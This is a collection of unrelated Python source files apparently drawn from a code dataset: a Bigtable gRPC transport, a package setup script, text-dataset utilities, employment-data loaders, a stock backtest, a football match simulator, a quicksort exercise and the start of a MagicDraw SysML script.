response_deserializer=bigtable_table_admin.ListBackupsResponse.deserialize,\n )\n return self._stubs[\"list_backups\"]\n\n @property\n def restore_table(\n self,\n ) -> Callable[\n [bigtable_table_admin.RestoreTableRequest], Awaitable[operations_pb2.Operation]\n ]:\n r\"\"\"Return a callable for the restore table method over gRPC.\n\n Create a new table by restoring from a completed backup. The\n returned table [long-running\n operation][google.longrunning.Operation] can be used to track\n the progress of the operation, and to cancel it. The\n [metadata][google.longrunning.Operation.metadata] field type is\n [RestoreTableMetadata][google.bigtable.admin.RestoreTableMetadata].\n The [response][google.longrunning.Operation.response] type is\n [Table][google.bigtable.admin.v2.Table], if successful.\n\n Returns:\n Callable[[~.RestoreTableRequest],\n Awaitable[~.Operation]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"restore_table\" not in self._stubs:\n self._stubs[\"restore_table\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/RestoreTable\",\n request_serializer=bigtable_table_admin.RestoreTableRequest.serialize,\n response_deserializer=operations_pb2.Operation.FromString,\n )\n return self._stubs[\"restore_table\"]\n\n @property\n def copy_backup(\n self,\n ) -> Callable[\n [bigtable_table_admin.CopyBackupRequest], Awaitable[operations_pb2.Operation]\n ]:\n r\"\"\"Return a callable for the copy backup method over gRPC.\n\n Copy a Cloud Bigtable backup to a new backup in the\n destination cluster located in the destination instance\n and project.\n\n Returns:\n Callable[[~.CopyBackupRequest],\n Awaitable[~.Operation]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"copy_backup\" not in self._stubs:\n self._stubs[\"copy_backup\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/CopyBackup\",\n request_serializer=bigtable_table_admin.CopyBackupRequest.serialize,\n response_deserializer=operations_pb2.Operation.FromString,\n )\n return self._stubs[\"copy_backup\"]\n\n @property\n def get_iam_policy(\n self,\n ) -> Callable[[iam_policy_pb2.GetIamPolicyRequest], Awaitable[policy_pb2.Policy]]:\n r\"\"\"Return a callable for the get iam policy method over gRPC.\n\n Gets the access control policy for a Table or Backup\n resource. Returns an empty policy if the resource exists\n but does not have a policy set.\n\n Returns:\n Callable[[~.GetIamPolicyRequest],\n Awaitable[~.Policy]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"get_iam_policy\" not in self._stubs:\n self._stubs[\"get_iam_policy\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/GetIamPolicy\",\n request_serializer=iam_policy_pb2.GetIamPolicyRequest.SerializeToString,\n response_deserializer=policy_pb2.Policy.FromString,\n )\n return self._stubs[\"get_iam_policy\"]\n\n @property\n def set_iam_policy(\n self,\n ) -> Callable[[iam_policy_pb2.SetIamPolicyRequest], Awaitable[policy_pb2.Policy]]:\n r\"\"\"Return a callable for the set iam policy method over gRPC.\n\n Sets the access control policy on a Table or Backup\n resource. Replaces any existing policy.\n\n Returns:\n Callable[[~.SetIamPolicyRequest],\n Awaitable[~.Policy]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"set_iam_policy\" not in self._stubs:\n self._stubs[\"set_iam_policy\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/SetIamPolicy\",\n request_serializer=iam_policy_pb2.SetIamPolicyRequest.SerializeToString,\n response_deserializer=policy_pb2.Policy.FromString,\n )\n return self._stubs[\"set_iam_policy\"]\n\n @property\n def test_iam_permissions(\n self,\n ) -> Callable[\n [iam_policy_pb2.TestIamPermissionsRequest],\n Awaitable[iam_policy_pb2.TestIamPermissionsResponse],\n ]:\n r\"\"\"Return a callable for the test iam permissions method over gRPC.\n\n Returns permissions that the caller has on the\n specified Table or Backup resource.\n\n Returns:\n Callable[[~.TestIamPermissionsRequest],\n Awaitable[~.TestIamPermissionsResponse]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"test_iam_permissions\" not in self._stubs:\n self._stubs[\"test_iam_permissions\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/TestIamPermissions\",\n request_serializer=iam_policy_pb2.TestIamPermissionsRequest.SerializeToString,\n response_deserializer=iam_policy_pb2.TestIamPermissionsResponse.FromString,\n )\n return self._stubs[\"test_iam_permissions\"]\n\n def close(self):\n return self.grpc_channel.close()\n\n\n__all__ = (\"BigtableTableAdminGrpcAsyncIOTransport\",)\n","sub_path":"google/cloud/bigtable_admin_v2/services/bigtable_table_admin/transports/grpc_asyncio.py","file_name":"grpc_asyncio.py","file_ext":"py","file_size_in_byte":45402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"29462159","text":"# coding: utf-8\n\nfrom setuptools import setup, find_packages\nfrom pathlib import Path\n\n# Get __verison_dunder without importing lama\nversion_file = Path(__file__).resolve().parent / 'lama' / 'version.py'\nexec(open(version_file).read())\n\n\nsetup(\n name='lama_phenotype_detection',\n download_url=f'https://github.com/mpi2/lama/archive/{__version__}.tar.gz',\n version=__version__,\n packages=find_packages(exclude=(\"dev\")),\n package_data={'': ['current_commit',\n 'stats/rscripts/lmFast.R',\n 'stats/rscripts/r_padjust.R']}, # Puts it in the wheel dist. MANIFEST.in gets it in source dist\n include_package_data=True,\n install_requires=[\n 'appdirs',\n 'matplotlib>=2.2.0',\n 'numpy>=1.15.0',\n 'pandas>=1.1.0',\n 'scikit-learn>=0.19.2',\n 'scipy>=1.1.0',\n 'scikit-image==0.17.2',\n 'seaborn>=0.9.0',\n 'statsmodels>=0.9.0',\n 'PyYAML>=3.13',\n 'SimpleITK>=1.1.0',\n 'filelock',\n 'psutil',\n 'logzero',\n 'addict',\n 'toml',\n 'pynrrd',\n 'pytest',\n 'tqdm',\n 'gitpython'\n ],\n extras_require={\n 'dev': ['pyradiomics'],\n },\n url='https://github.com/mpi2/LAMA',\n license='Apache2',\n author='Neil Horner',\n author_email='n.horner@har.mrc.ac.uk, bit@har.mrc.ac.uk',\n description='Phenotype detection pipeline for finding abnormalities in mouse embryos',\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n keywords=['image processing', 'bioinformatics', 'phenotype'],\n entry_points ={\n 'console_scripts': [\n 'lama_reg=lama.scripts.lama_reg:main',\n 'lama_get_test_data=lama.scripts.lama_get_test_data:main',\n 'lama_get_walkthrough_data=lama.scripts.lama_get_walkthrough_data:main',\n 'lama_job_runner=lama.scripts.lama_job_runner:main',\n 'lama_permutation_stats=lama.scripts.lama_permutation_stats:main',\n 'lama_stats=lama.scripts.lama_stats:main',\n 'lama_pad_volumes=lama.utilities.lama_pad_volumes:main',\n 'lama_convert_16_to_8=lama.utilities.lama_convert_16_to_8:main',\n 'lama_img_info=lama.utilities.lama_img_info:main'\n ]\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"535932139","text":"import numpy as np\nimport torch\nfrom torch.utils.data import Dataset\nfrom collections import Counter\nfrom gensim.models import KeyedVectors\nimport re\nimport json\n\n#provide pretrained embeddings for text\ndef load_embeddings(pytorch_embedding, word2idx, filename, embedding_size):\n print(\"Copying pretrained word embeddings from \", filename, flush=True)\n en_model = KeyedVectors.load_word2vec_format(filename)\n \"\"\" Fetching all of the words in the vocabulary. \"\"\"\n pretrained_words = set()\n for word in en_model.vocab:\n pretrained_words.add(word)\n\n arr = [0] * len(word2idx)\n for word in word2idx:\n index = word2idx[word]\n if word in pretrained_words:\n arr[index] = en_model[word]\n else:\n arr[index] = np.random.uniform(-1.0, 1.0, embedding_size)\n\n \"\"\" Creating a numpy dictionary for the index -> embedding mapping \"\"\"\n arr = np.array(arr)\n \"\"\" Add the word embeddings to the empty PyTorch Embedding object \"\"\"\n pytorch_embedding.weight.data.copy_(torch.from_numpy(arr))\n return pytorch_embedding\n\n#Transforms a Corpus into lists of word indices.\nclass Vectorizer:\n def __init__(self, max_words=None, min_frequency=None, start_end_tokens=True, maxlen=None):\n self.vocabulary = None\n self.vocabulary_size = 0\n self.word2idx = dict()\n self.idx2word = dict()\n #most common words\n self.max_words = max_words\n #least common words\n self.min_frequency = min_frequency\n self.start_end_tokens = start_end_tokens\n self.maxlen = maxlen\n\n def _find_max_sentence_length(self, corpus, template):\n if not template:\n self.maxlen = max(len(sent) for document in corpus for sent in document)\n else:\n self.maxlen = max(len(sent) for sent in corpus)\n if self.start_end_tokens:\n self.maxlen += 2\n\n def _build_vocabulary(self, corpus, template):\n if not template:\n vocabulary = Counter(word for document in corpus for sent in document for word in sent)\n else:\n vocabulary = Counter(word for sent in corpus for word in sent)\n if self.max_words:\n vocabulary = {word: freq for word,\n freq in vocabulary.most_common(self.max_words)}\n if self.min_frequency:\n vocabulary = {word: freq for word, freq in vocabulary.items()\n if freq >= self.min_frequency}\n self.vocabulary = vocabulary\n self.vocabulary_size = len(vocabulary) + 2 # padding and unk tokens\n if self.start_end_tokens:\n self.vocabulary_size += 2\n\n def _build_word_index(self):\n self.word2idx[''] = 3\n self.word2idx[''] = 0\n\n if self.start_end_tokens:\n self.word2idx[''] = 1\n self.word2idx[''] = 2\n\n offset = len(self.word2idx)\n for idx, word in enumerate(self.vocabulary):\n self.word2idx[word] = idx + offset\n self.idx2word = {idx: word for word, idx in self.word2idx.items()}\n\n def fit(self, corpus, template = False):\n if not self.maxlen:\n self._find_max_sentence_length(corpus, template)\n self._build_vocabulary(corpus, template)\n self._build_word_index()\n\n def add_start_end(self, vector):\n vector.append(self.word2idx[''])\n return [self.word2idx['']] + vector\n\n def transform_sentence(self, sentence):\n \"\"\"\n Vectorize a single sentence\n \"\"\"\n vector = [self.word2idx.get(word, 3) for word in sentence]\n if self.start_end_tokens:\n vector = self.add_start_end(vector)\n return vector\n\n def transform(self, corpus, template = False):\n \"\"\"\n Vectorizes a corpus in the form of a list of lists.\n A corpus is a list of documents and a document is a list of sentence.\n \"\"\"\n vcorpus = []\n if not template:\n for document in corpus:\n vcorpus.append([self.transform_sentence(sentence) for sentence in document])\n else:\n vcorpus.extend([self.transform_sentence(sentence) for sentence in corpus])\n return vcorpus\n\nclass headline2abstractdataset(Dataset):\n def __init__(self, path, vectorizer, USE_CUDA=torch.cuda.is_available(), max_len=200):\n self.head_len = 0\n self.abs_len = 0\n self.max_len = max_len\n self.max_context_length = -1\n self.context_vectorizer = {}\n self.corpus, self.topics_corpus = self._read_corpus(path)\n self.vectorizer = vectorizer\n self.data = self._vectorize_corpus()\n self._initalcorpus()\n self.USE_CUDA = USE_CUDA\n\n def pad_sentence_vector(self, vector, maxlen, pad_value=0):\n org_length = len(vector)\n padding = maxlen - org_length\n vector.extend([pad_value] * padding)\n vector.append(org_length)\n return vector\n\n def _initalcorpus(self):\n old = []\n for i, j in zip(self.data, self.topics_corpus):\n source = i[0]\n target = i[1]\n vectorized_topics = j\n if len(source) > self.head_len:\n self.head_len = len(source)\n if len(target) <= self.max_len:\n if len(target) > self.abs_len:\n self.abs_len = len(target)\n else:\n target = target[:self.max_len-1]\n target.append(1)#word2idx[''] = 1\n self.abs_len = len(target)\n old.append((source[1:-1], target, vectorized_topics))\n old.sort(key = lambda x: len(x[0]), reverse = True)\n corpus = []\n for source, target, vectorized_topics in old:\n vectorized_topics = self.pad_sentence_vector(vectorized_topics, self.max_context_length, pad_value=self.context_vectorizer[''])\n team = [len(source), len(target), self.pad_sentence_vector(source, self.head_len), self.pad_sentence_vector(target, self.abs_len), vectorized_topics]\n corpus.append(team)\n self.data = corpus\n\n def _read_corpus(self, path):\n abstracts = []\n headlines = []\n topics = []\n i = 0\n with open(path, encoding=\"utf-8\") as f:\n for line in f:\n j = json.loads(line)\n headlines.append(j[\"title\"])\n abstracts.append(j[\"abstract\"])\n if \"topics\" in j:\n topics.append(j[\"topics\"])\n i += 1\n corpus = []\n topics_v = []\n for i in range(len(abstracts)):\n if len(headlines[i]) > 0 and len(abstracts[i]) > 0:\n h_a_pair = []\n h_a_pair.append(self._tokenize_word(headlines[i]))\n h_a_pair.append(self._tokenize_word(abstracts[i]))\n if len(h_a_pair) > 1:\n corpus.append(h_a_pair)\n vectorized_topics = []\n if topics:\n for t in topics[i]:\n t = t.lower()\n if t not in self.context_vectorizer:\n self.context_vectorizer[t] = len(self.context_vectorizer)\n vectorized_topics.append(self.context_vectorizer[t])\n self.max_context_length = max(self.max_context_length, len(vectorized_topics))\n topics_v.append(vectorized_topics)\n self.context_vectorizer[''] = len(self.context_vectorizer)\n return corpus, topics_v\n\n def _tokenize_word(self, sentence):\n result = []\n for word in sentence.split():\n if word:\n result.append(word)\n return result\n\n #sentence to word id\n def _vectorize_corpus(self):\n if not self.vectorizer.vocabulary:\n self.vectorizer.fit(self.corpus)\n return self.vectorizer.transform(self.corpus)\n\n def __getitem__(self, index):\n len_s, len_t, source, target, topics = self.data[index]\n source = torch.LongTensor(source)\n topics = torch.LongTensor(topics)\n target = torch.LongTensor(target)\n if self.USE_CUDA:\n source = source.cuda()\n target = target.cuda()\n topics = topics.cuda()\n return source, target, len_s, topics\n\n def __len__(self):\n return len(self.data)\n","sub_path":"Writing-editing network/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"474917679","text":"from functools import reduce\nfrom os import getcwd\nfrom os.path import join\nimport pandas as pd\nfrom ast import literal_eval\nimport glob\n\n\nCURRENT_DIR = getcwd()\nEMPREGOS_DIR = join(CURRENT_DIR, \"data_sources/dados_empregos/*.txt\")\nCORRELACAO_DIR = join(CURRENT_DIR, \"data_sources/dados_empregos/correlacao/*.txt\")\nFILES_NAMES = glob.glob(EMPREGOS_DIR)\nCORRELACAO_FILES_NAMES = glob.glob(CORRELACAO_DIR)\n\ndef fillDataFramesEmpregos(file):\n \"\"\"\n Função que retorna um dataframe gerado a partir dos dados do arquivo lido\n :param file: String\n :return: Dictionary\n \"\"\"\n data_frame_dict = {}\n f = open(file, 'r', encoding='iso-8859-15')\n line = f.readline()\n dict = literal_eval(line)\n key = dict[\"nome_estendido\"][39:]\n df = pd.DataFrame(dict[\"valores\"])\n data_frame_dict[key] = df\n f.close()\n\n return data_frame_dict\n\n\ndef getDataFramesEmpregos():\n \"\"\"\n Função que mapeia a função de geração de dataframes no arquivo\n :return: List\n \"\"\"\n global FILES_NAMES\n return list(map(fillDataFramesEmpregos, FILES_NAMES))\n\n\ndef dataFrameEmpregosFromJson(filename):\n \"\"\"\n Função que gera dataframes a partir dos arquivos de uma forma especial para gerar o dataframe do gráfico de\n correlação\n :param filename: String\n :return: pandas.DataFrame\n \"\"\"\n f = open(filename, 'r', encoding='iso-8859-15')\n line = f.readline()\n dict = literal_eval(line)\n key = dict[\"nome_estendido\"][39:]\n ad = key.split(\",\")[-1].strip(\" \")\n categoria = key.split(\"-\")[0].strip(\" \")\n df = pd.DataFrame(dict[\"valores\"])\n df[\"categoria\"] = categoria\n df[\"admitidos/desligados\"] = ad\n f.close()\n return df\n\n\n\ndef getDataFrameEmpregosFromJson():\n \"\"\"\n Função que retorna o dataframe com os valores condensados em um só\n :return: pandas.DataFrame\n \"\"\"\n global FILES_NAMES\n list_df_desemprego = list(map(dataFrameEmpregosFromJson, CORRELACAO_FILES_NAMES))\n df_desemprego = reduce(lambda df1, df2: pd.concat([df1, df2], ignore_index=True, sort=True), list_df_desemprego)\n df_desemprego_group_by_desligados_uf = df_desemprego.groupby([\"estado_ibge\", \"ano\", \"admitidos/desligados\"])[\n \"valor\"].sum().reset_index(name='total_desempregados')\n df_desemprego_group_by_desligados_uf = df_desemprego_group_by_desligados_uf[\n df_desemprego_group_by_desligados_uf[\"admitidos/desligados\"] == \"Desligado\"].reset_index()\n del df_desemprego_group_by_desligados_uf['index']\n return df_desemprego_group_by_desligados_uf","sub_path":"src/data_sources/dataframes_empregos.py","file_name":"dataframes_empregos.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"260274192","text":"# -*- coding: utf-8 -*-\nimport math\nfrom datetime import datetime, date, time, timedelta\nfrom futuquant import *\n\nimport trader\n\nclass WeeklyTreader(object):\n \n # API parameter setting\n api_svr_ip = '127.0.0.1' # 账户登录的牛牛客户端PC的IP, 本机默认为127.0.0.1\n api_svr_port = 11111 # 富途牛牛端口,默认为11111\n unlock_password = \"196331\" # 美股和港股交易解锁密码\n trade_env = 1 # 0: 真实交易 1: 仿真交易(仿真交易无密码验证,美股暂不支持仿真)\n trader = trader.Trader(10000,0,8)\n\n def __init__(self, stock):\n self.stock = stock\n self.quote_ctx = self.contextSetting()\n\n def contextSetting(self):\n \n SysConfig.set_client_info(\"LavrockFutuQuant\", 0)\n quote_ctx = OpenQuoteContext(host='127.0.0.1', port=11111)\n \n return quote_ctx\n\n def weeklyTopBottom(self,prices,index, n):\n\n if len(prices) == 0 or index - n < 0:\n print('len(klines) == 0 \\n')\n return 0,0\n startIndex = index -n\n lc = float(prices[\"close\"][startIndex])\n hc = float(prices[\"close\"][startIndex])\n hh = float(prices[\"high\"][startIndex])\n ll = float(prices[\"low\"][startIndex])\n\n for i in range(len(prices)-n,index):\n # print(index)\n close = float(prices[\"close\"][i])\n open = float(prices[\"open\"][i])\n high = float(prices[\"high\"][i])\n low = float(prices[\"low\"][i])\n\n if hh < high:\n hh = high\n if hc < close:\n hc = close\n if ll > low:\n ll = low\n if lc > close:\n lc = close\n return hh,ll\n\n def handleDay(self,prices,index,isLastDay):\n hh,ll = self.weeklyTopBottom(prices,index,30)\n if hh ==0 or ll==0 :\n print('get_history_kline error!\\n')\n return\n\n cur_price = prices['close'].values[index]\n cur_pos = self.trader.hold_count(self.stock)\n \n if cur_price <= ll or isLastDay:\n if cur_pos > 0:\n self.trader.sell(self.stock,cur_price)\n elif cur_price >= hh :\n if cur_pos == 0:\n self.trader.buy(self.stock,cur_price)\n \n def testBack(self,start,end):\n\n ret_code, days = self.quote_ctx.get_trading_days(\"US\", start, end)\n \n if ret_code != 0:\n print('get_trading_days error!\\n')\n return\n print('get_trading_days:!\\n', days)\n _, prices = self.quote_ctx.get_history_kline(self.stock, start=start,end=end)\n \n for index in range(len(prices)):\n self.handleDay(prices,index,index == len(prices) -1)\n \n print('money:!\\n', self.trader.money)\n print('hold:!\\n', self.trader.hold)\n print('count :!\\n', len(self.trader.history))\n \n return\n\nif __name__ == \"__main__\":\n \n\n STOCK = \"US.TSLA\"\n \n test = WeeklyTreader(STOCK)\n test.testBack(\"2016-08-01\", \"2017-09-01\") ","sub_path":"src/weeklyTrader.py","file_name":"weeklyTrader.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"557130924","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 13 17:16:20 2020\n@author: Alex Taylor\n\nHandles match logic\nteam1 - Team, home team\nteam2 - Team, away team\nverbose - Boolean, ...\nteamDeltaFactor - Float, ...\n\nTO DO:\n Yellow/Red cards\n Substitutions\n\"\"\" \n\nimport numpy as np\nimport random\nimport time\n\nclass Match:\n \n def __init__(self,team1,team2,verbose=False,teamDeltaFactor = 2.5):\n self.teams = [team1,team2]\n self.verbose = verbose\n self.goals = [0,0]\n self.minuteCounter = 0\n self.teamDeltaFactor = teamDeltaFactor\n # Calculate probability of scoring a goal based on form and team + player stats\n self.goalChance = [int(round(self.teams[0].form - self.teamDeltaFactor*(self.teams[0].attack / self.teams[1].defence) + random.randint(-2,2) - 2)),\\\n int(round(self.teams[1].form - self.teamDeltaFactor*(self.teams[1].attack / self.teams[0].defence) + random.randint(-2,2)))]\n # Attempt to break from lose streaks\n for i in range(2):\n if self.teams[i].loseStreak > 5:\n self.goalChance[i] -= 1\n self.goalChance[i] = max(self.goalChance[i],2)\n self.yellowChance = random.randint(40,80)\n self.redChance = random.randint(1,5)\n self.cards=[[0]*11,[0]*11]\n self.suspendedPlayers = [[],[]]\n self.matchLoop()\n \n def scoreGoal(self,teamIndex):\n self.goals[teamIndex] += 1\n self.teams[0].increaseGoals(teamIndex)\n self.teams[1].increaseGoals(1 - teamIndex)\n playerIndex = np.random.choice(range(11),1,self.teams[teamIndex].goalProbabilities)[0]\n while self.cards[teamIndex][playerIndex] > 1:\n playerIndex = random.randint(1,10)\n self.teams[teamIndex].players[playerIndex].scoreGoal()\n if self.verbose:\n print(f\"GOAL! {self.team[teamIndex].name} {self.teams[teamIndex].players[playerIndex].name}\")\n if self.verbose:\n print(\"\")\n time.sleep(1.5)\n \n def giveCard(self,teamIndex):\n playerIndex = random.randint(0,10)\n while playerIndex in self.suspendedPlayers[teamIndex]:\n playerIndex = random.randint(0,10)\n self.cards[teamIndex][playerIndex] += 1\n if self.cards[teamIndex][playerIndex] > 1:\n self.suspendedPlayers[teamIndex].append(playerIndex)\n if self.verbose:\n print(f\"RED CARD! {self.teams[teamIndex].name} {self.teams[teamIndex].players[playerIndex].name}\")\n self.goalChance[teamIndex] += 3\n self.goalChance[1-teamIndex] -= 3\n self.goalChance[1-teamIndex] = max(self.goalChance[1-teamIndex],2)\n else:\n if self.verbose:\n print(f\"YELLOW CARD! {self.teams[teamIndex].name} {self.teams[teamIndex].players[playerIndex].name}\")\n if self.verbose:\n print(\"\")\n time.sleep(1.5)\n \n def matchLoop(self):\n while self.minuteCounter <= 90:\n # Check for goal scored\n if random.randint(0,1) == 0:\n if random.randint(0,self.goalChance[0]) == 0:\n self.scoreGoal(0)\n else:\n if random.randint(0,self.goalChance[1]) == 0:\n self.scoreGoal(1)\n # Check for card\n if random.randint(0,self.yellowChance) == 0:\n self.giveCard(random.randint(0,1))\n # Update ticker\n if self.verbose: \n print(str(self.minuteCounter) + ': ' + self.teams[0].name + \" \" \n + str(self.goals[0]) + ' - ' + str(self.goals[1]) + \" \" + self.teams[1].name)\n time.sleep(0.08)\n self.minuteCounter += 1\n if self.goals[0] > self.goals[1]:\n self.teams[0].setResult(0)\n self.teams[1].setResult(2)\n elif self.goals[0] < self.goals[1]:\n self.teams[0].setResult(2)\n self.teams[1].setResult(0)\n else:\n self.teams[0].setResult(1)\n self.teams[1].setResult(1)","sub_path":"LeagueSimulator/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"72070270","text":"# Problem: https://www.hackerrank.com/challenges/quicksort1/problem\n\ndef quickSort(arr): \n left, right, mid = [], [], []\n for i in range(len(arr)): \n if arr[i] < arr[0]:\n left.append(arr[i])\n elif arr[i] > arr[0]:\n right.append(arr[i])\n else:\n mid.append(arr[i])\n print(*(left + mid+ right))\n\n\nn = int(input())\narr = list(map(int, input().rstrip().split()))\nresult = quickSort(arr)\n\n","sub_path":"Hackerrank/Algorithms/quicksor1-Partition.py","file_name":"quicksor1-Partition.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"641395117","text":"from rels import *\r\n\r\ndf = raw_df\r\nfirst = 1\r\nfinal_df = df\r\ntrain_set_len = 1000 # len(vEntryList) - 100 == 1625\r\nfor i in range(train_set_len):\r\n # Data proc.\r\n raw_data = pd.DataFrame(df[vEntryList[i][0]:vEntryList[i + 1][0]])\r\n new_df = df_process(raw_data)\r\n\r\n # smoothing and cutting\r\n cols_to_smooth = [col for col in new_df.columns if 'Local' in col]\r\n sm_start = 15\r\n sm_end = new_df.shape[0] - 15\r\n sm_len = 5\r\n # for col in cols_to_smooth:\r\n # new_df = df_smoother(new_df, col, sm_start, sm_end, sm_len)\r\n new_df = new_df[sm_start:sm_end]\r\n new_df['final_X_pre'] = new_df['Local_X_pre']\r\n new_df['final_Y_pre'] = new_df['Local_Y_pre']\r\n new_df = new_df.drop(columns=['Local_X_pre', 'Local_Y_pre'])\r\n if first:\r\n first = 0\r\n final_df = new_df\r\n else:\r\n final_df = final_df.append(new_df, ignore_index=True)\r\n print('No.', i + 1, 'Vehicle DF save OK.', i + 1, '/', train_set_len, final_df.shape)\r\n\r\nsaveFile = open('df_concat_res_0605_1000.bin', 'wb')\r\npickle.dump(final_df, saveFile)\r\nsaveFile.close()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"323530473","text":"import pytest\nimport numpy as np\nfrom scipy import constants as C\nimport dispersion\n\nclass TestSpotCheckSolids:\n # Most of the data points from https://refractiveindex.info\n l1 = 1.0e-6/(2*np.pi)\n w1 = C.c/l1\n def test_bk7(self):\n mat = dispersion.BK7(self.l1)\n data = [(.532e-6,1.5195),(.6328e-6,1.51502),(1.064e-6,1.5066)]\n for d in data:\n w = 2*np.pi*C.c/d[0]\n n = np.sqrt(1+mat.chi(w/self.w1))\n assert n == pytest.approx(d[1],1e-4)\n def test_germanium(self):\n mat = dispersion.Ge(self.l1)\n data = [(2e-6,4.1085),(5e-6,4.0158),(10e-6,4.0040)]\n for d in data:\n w = 2*np.pi*C.c/d[0]\n n = np.sqrt(1+mat.chi(w/self.w1))\n assert n == pytest.approx(d[1],1e-4)\n def test_znse(self):\n mat = dispersion.ZnSe(self.l1)\n data = [(2.5e-6,2.4362),(5e-6,2.4132),(10e-6,2.3923)]\n for d in data:\n w = 2*np.pi*C.c/d[0]\n n = np.sqrt(1+mat.chi(w/self.w1))\n assert n == pytest.approx(d[1],1e-2)\n def test_nacl(self):\n mat = dispersion.NaCl(self.l1)\n data = [(2.5e-6,1.5330),(5e-6,1.5240),(10e-6,1.5000)]\n for d in data:\n w = 2*np.pi*C.c/d[0]\n n = np.sqrt(1+mat.chi(w/self.w1))\n assert n == pytest.approx(d[1],1e-2)\n def test_kcl(self):\n mat = dispersion.KCl(self.l1)\n data = [(2.5e-6,1.4780),(5e-6,1.4720),(10e-6,1.4580)]\n for d in data:\n w = 2*np.pi*C.c/d[0]\n n = np.sqrt(1+mat.chi(w/self.w1))\n assert n == pytest.approx(d[1],1e-2)\n","sub_path":"test/dispersion_test.py","file_name":"dispersion_test.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"418358049","text":"'''\nCreated on Nov 3, 2010\n\n@author: dlam\n'''\nfrom java.lang import *\nfrom com.nomagic.magicdraw.uml.symbols import *\nfrom com.nomagic.magicdraw.core import Application\nfrom com.nomagic.uml2.ext.jmi.helpers import StereotypesHelper\nfrom com.nomagic.magicdraw.openapi.uml import SessionManager\nfrom com.nomagic.magicdraw.openapi.uml import ModelElementsManager\nfrom com.nomagic.uml2.ext.jmi.helpers import ModelHelper\nfrom com.nomagic.magicdraw.ui.dialogs import *\nfrom com.nomagic.uml2.ext.magicdraw.classes.mdkernel import *\nfrom com.nomagic.uml2.ext.magicdraw.classes.mddependencies import *\nfrom com.nomagic.uml2.ext.magicdraw.classes.mdinterfaces import *\nfrom com.nomagic.uml2.ext.magicdraw.actions.mdbasicactions import *\nfrom com.nomagic.uml2.ext.magicdraw.activities.mdbasicactivities import *\nfrom com.nomagic.uml2.ext.magicdraw.activities.mdintermediateactivities import *\nfrom com.nomagic.uml2.ext.magicdraw.auxiliaryconstructs.mdinformationflows import *\nfrom com.nomagic.uml2.ext.magicdraw.activities.mdfundamentalactivities import *\nfrom com.nomagic.uml2.ext.magicdraw.compositestructures.mdports import Port\n\nfrom javax.swing import JOptionPane\nfrom javax.swing import JCheckBox\nfrom jarray import array\n\nproject = Application.getInstance().getProjectsManager().getActiveProject()\nBlockStereotype = StereotypesHelper.getStereotype(project,\"Block\")\nConstraintBlockStereotype = StereotypesHelper.getStereotype(project, 'ConstraintBlock')\n\nPartPropertyStereotype = StereotypesHelper.getStereotype(project, 'PartProperty')\nValuePropertyStereotype = StereotypesHelper.getStereotype(project, 'ValueProperty')\nConstraintPropertyStereotype = StereotypesHelper.getStereotype(project, 'ConstraintProperty')\nSharedPropertyStereotype = StereotypesHelper.getStereotype(project, 'SharedProperty')\nReferencePropertyStereotype = StereotypesHelper.getStereotype(project, 'ReferenceProperty')\n\nBindingConnectorStereotype = StereotypesHelper.getStereotype(project, 'BindingConnector')\nNestedConnectorEndStereotype = StereotypesHelper.getStereotype(project, 'NestedConnectorEnd')\n\nConstraintParameterStereotype = StereotypesHelper.getStereotype(project, 'ConstraintParameter')\nFlowPortStereotype = StereotypesHelper.getStereotype(project, 'FlowPort')\n\nRealValueType = filter(lambda element: element.getName() == 'Real',\n ModelHelper.getElementsOfType(project.getModel(), [DataType], False))[0]\nIntegerValueType = filter(lambda element: element.getName() == 'Integer',\n ModelHelper.getElementsOfType(project.getModel(), [DataType], 